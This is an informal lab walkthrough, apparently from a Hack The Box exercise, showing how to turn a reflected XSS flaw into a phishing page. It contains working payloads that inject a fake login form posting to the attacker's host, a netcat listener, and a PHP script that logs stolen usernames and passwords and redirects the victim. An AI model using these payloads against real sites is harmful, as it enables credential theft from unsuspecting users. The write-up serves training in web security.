We're going to kinda just jump into this part way through 'cause I needed an area to keep notes on stuff I was working on... so if you're having issues prior to this and are reading this for help... sorry. Pop a question in and I'll see what I can do.
For this area, we're going to be using the XSS site to get some javascript to pop up on the page. The usual XSS isn't working from their screen:
http://SERVER_IP/phishing/index.php?url=<script>alert(window.origin)</script>When we run this we can see the HTML output it gives us this, which is just placing our tags as the destination of an image. What we need to do is tell the src tag that we're done and then concatenate the rest of our script tag on.
<img src ='<script>alert(window.orgtin)</script>'>Simply adding the '> before our script tag seems to have fixed that.
http://SERVER_IP/phishing/index.php?url='><script>alert(window.origin)</script>Great! So now we need to work on injecting our login form. We'll use their example for this:
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>We're going to put it on one line and use document.write() to modify the page with this form.
'><script>document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');</script>That's tasty. Let's remove the Image URL portion by using
document.getElementById().remove()Looking at the source code, we want to get rid of that form completely by toasting the id: urlform. Let's also clean up any code at the end of form so it looks a bit more professional. The new one-liner is:
?url='><script>document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--OK so now we have a login form to use. We're going to steal some credentials now!!! We're going to start a netcat listener but if you're using the HTB system you may run into some issues about the port being already used. You'll need to specify which IP to assign the listener to. You can do this like this then specify the port it shows in your injection:
nc -lvn 10.10.14.26What we need to do after it's tested is setup a forwarding page so it looks like it was just a failed login. We're going to create a quick PHP page to do this. We're also going to stop using netcat and instead create a PHP listener for the connection. Here's the PHP page we want to make on our VM called index.php. We'll place it in /tmp/tmpserver, the SERVER_IP will be the IP from the exercise.
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
header("Location: http://SERVER_IP/phishing/index.php");
fclose($file);
exit();
}
?>Here's how to set it up:
mkdir /tmp/tmpserver
cd /tmp/tmpserver
vi index.php #at this step we wrote our index.php file
sudo php -S 10.10.14.24:31337 (or whatever port you're listening on)OK so now it's up to us to do this and get logon on the next page /login.php. We're going to give our newly created URL to the phishing/send.php page and capture those logins. Basically re-do everything we just did, copy and paste it into the field and it will capture the needed info for you to login to that /login.php page.
Comentarios